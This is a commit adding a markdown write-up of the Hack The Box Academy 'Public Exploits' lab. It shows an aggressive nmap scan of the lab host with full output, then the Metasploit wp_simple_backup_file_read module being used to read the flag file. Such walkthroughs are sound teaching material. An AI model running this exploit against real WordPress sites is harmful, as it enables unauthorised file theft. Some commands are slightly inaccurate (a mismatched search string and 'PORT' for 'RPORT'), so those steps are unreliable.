Commit 4afba1
2025-12-19 11:53:03 Elijah Ketchersid: init| /dev/null .. cybersecurity/hackthebox/cpts/getting started/public exploits.md | |
| @@ 0,0 1,86 @@ | |
| + | # Getting Started |
| + | ## Public Exploits |
| + | One thing that frustrates me a bit when it comes to HTB academy is that it practically forces you to buy the yearly, that way you can actually "learn" how to do the class. Therefore, I figured might as well do some write-ups for anyone who needs help. |
| + | |
| + | Firstly, make sure to spawn the target in, in my case, |
| + | |
| + |  |
| + | |
| + | Something to note about hackthebox attacks that isn't mentioned within the academy, is that the port number is where the malicious *thing* is, it's a neat little hint for things like this. |
| + | |
| + | In the previous lessons, it taught us about nmap, however, the first command that should be ran is |
| + | ``` |
| + | sudo nmap -A -p 47782 94.237.58.137 |
| + | ``` |
| + | _Side Note, if you want to know the "proper" way to sccan for the ports, just do `nmap -sV -sC -p- [Target IP]` might take a bit though. |
| + | |
| + | This will do an "aggressive" scan, which basically does all of the following without requiring us to actually put in the command: |
| + | - OS Detection (-O): Attempts to identify the operating system running on the target. |
| + | - Version Detection (-sV): Probes open ports to determine what specific service and version number are running (e.g., Apache 2.4.41 instead of just "http"). |
| + | - Script Scanning (-sC): Runs a collection of default Nmap Scripting Engine (NSE) scripts to check for common vulnerabilities or gather more information about services. |
| + | - Traceroute (--traceroute): Maps the network path from your machine to the target host. |
| + | Additionally, the -p causes the specific port to be scanned. |
| + | |
| + | ``` |
| + | └──╼ [★]$ sudo nmap -A -p 47782 94.237.58.137 |
| + | Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 05:33 CST |
| + | Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan |
| + | Service scan Timing: About 0.00% done |
| + | Nmap scan report for 94-237-58-137.uk-lon1.upcloud.host (94.237.58.137) |
| + | Host is up (0.00046s latency). |
| + | |
| + | PORT STATE SERVICE VERSION |
| + | 47782/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |
| + | |_http-server-header: Apache/2.4.41 (Ubuntu) |
| + | |_http-title: Getting Started – Just another WordPress site |
| + | |_http-generator: WordPress 5.6.1 |
| + | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port |
| + | Device type: phone|proxy server|VoIP phone|WAP|general purpose|webcam |
| + | Running (JUST GUESSING): Google Android 4.4.X|4.0.X (92%), WebSense embedded (91%), Linux 3.X (91%), Cisco embedded (91%), Linksys embedded (91%), AXIS embedded (89%) |
| + | OS CPE: cpe:/o:google:android:4.4.0 cpe:/o:linux:linux_kernel cpe:/h:cisco:cp-dx80 cpe:/o:google:android cpe:/h:linksys:ea3500 cpe:/o:linux:linux_kernel:3 cpe:/o:google:android:4.0.4 |
| + | Aggressive OS guesses: Android 4.4.0 (92%), Websense Content Gateway (91%), Cisco CP-DX80 collaboration endpoint (Android) (91%), Linksys EA3500 WAP (91%), Linux 3.6 - 3.10 (90%), Axis M3006-V network camera (89%), Android 4.0.4 (Linux 2.6) (89%), Linux 2.6.18 - 2.6.24 (89%), Linux 3.16 (89%), Suga embedded WiFi module (89%) |
| + | No exact OS matches for host (test conditions non-ideal). |
| + | Network Distance: 6 hops |
| + | |
| + | TRACEROUTE (using port 47782/tcp) |
| + | HOP RTT ADDRESS |
| + | 1 0.13 ms 94.237.48.1 |
| + | 2 0.23 ms 100.69.43.225 |
| + | 3 0.25 ms 172.17.252.33 |
| + | 4 0.25 ms 172.17.252.38 |
| + | 5 0.23 ms 100.69.45.147 |
| + | 6 0.38 ms 94-237-58-137.uk-lon1.upcloud.host (94.237.58.137) |
| + | |
| + | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . |
| + | Nmap done: 1 IP address (1 host up) scanned in 16.15 seconds |
| + | |
| + | ``` |
| + | Here we can see it's "Just Another Wordpress Site". Therefore, if we try to go to the domain: |
| + | |
| + |  |
| + | |
| + | Now it's time to use metasploit and see what we can do |
| + | ``` |
| + | msfconsole |
| + | ``` |
| + | Next, we need to search for an exploit. rather than trying to be extremely complex and such, let's just look for wordpress and the plugin that's quite literally... on the screen. |
| + | ``` |
| + | search WordPress 2.7.10 |
| + | ``` |
| + | From there we will see an output in regards to the exploits, there will only be one. |
| + | ``` |
| + | use exploit/unix/webapp/wp_simple_backup_file_read |
| + | ``` |
| + | Then, like in previous tutorials, we need to see what kind of information we must put in to use the exploit, therefore: |
| + | ``` |
| + | show options |
| + | ``` |
| + | Here we see that we need to set RHOST, RPORT, and FILEPATH. therefore |
| + | ``` |
| + | set RHOST [TARGET IP] |
| + | set PORT [TARGET PORT IP] |
| + | set FILEPATH flag.txt |
| + | ``` |
| + | afterwards, simply type `exploit`. |
| + | |
| + | then you can type `exit` upon execution, and find the file that you requested within your file manager. in my case it was just in the home directory and contained the flag. |